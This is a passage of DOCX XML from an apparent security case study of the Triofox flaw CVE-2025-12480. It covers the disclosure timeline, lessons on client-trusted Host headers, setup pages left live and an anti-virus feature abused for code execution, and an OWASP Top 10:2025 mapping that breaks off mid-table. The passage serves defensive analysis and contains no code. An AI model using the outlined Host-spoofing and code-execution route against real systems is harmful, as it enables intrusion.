              <w:t>Mandiant initiates contact with Gladinet about the suspected flaw.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8 October</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Improper access control vulnerability confirmed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>24 October</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gladinet reviews and acknowledges Mandiant's findings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10 November</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2025-12480 published; Mandiant blog released.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>12 November</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Added to the CISA KEV catalogue (remediation due 3 December).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6  Security Challenges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The incident exposes several challenges that generalise beyond this one product.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Access control cannot be delegated to the client. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The failure reduces to a server trusting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> header, a value the client writes, as evidence of where a request came from. Any control whose decision depends on attacker-supplied input is not a control. This is harder than it sounds, because frameworks routinely surface request metadata such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Request.Url.Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> as if it were trustworthy environmental data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialisation state is security state. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The application assumed setup pages are reached once, during installation, by a trusted operator; that assumption was never enforced, and the pages stayed live for the lifetime of the instance. First-run functionality exists precisely to bootstrap trust, so it must become inert the moment setup completes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Powerful features are attack surface. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The anti-virus integration runs an operator-chosen binary at high privilege. Combined with an exposed configuration page, it became a general-purpose code execution primitive. Any feature that runs a configurable path, or runs as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, must assume its configuration surface may one day be reached by someone untrusted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The patch gap is the exposure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The fix existed a month before exploitation began, yet vulnerable instances remained online and were compromised. For internet-facing infrastructure, the window between patch availability and application is itself the risk, independent of how the flaw was discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection must see through legitimacy. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The attacker used only signed, legitimate tools: Zoho UEMS, Zoho Assist, AnyDesk, PuTTY, and Plink. Detection could not rely on signatures; it had to rely on behaviour, such as a web server process spawning a command shell and renamed binaries establishing reverse tunnels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7  Analysis: Current Techniques and OWASP Top 10:2025 Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>7.1  The 2025 list in brief</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The OWASP Top 10 is a consensus ranking of the most significant web application security risks, built from data across more than 2.8 million applications supplemented by a community survey. The 2025 edition, its eighth, introduces two new categories, Software Supply Chain Failures (A03) and Mishandling of Exceptional Conditions (A10), and folds Server-Side Request Forgery into Broken Access Control. Table 4 lists all ten so the reader has the full frame; the analysis then concentrates only on the categories the Triofox evidence actually supports. Forcing the incident into all ten would be dishonest, so most of the list is acknowledged and set aside.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP Top 10:2025 categories and their relevance to CVE-2025-12480.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="737"/>
        <w:gridCol w:w="3175"/>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="3969"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Relevance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Basis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Root cause: spoofable </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>-header authorisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secondary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Live setup pages; optional </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TrustedHostIp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> unset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Software Supply Chain Failures</w:t>
            </w:r>
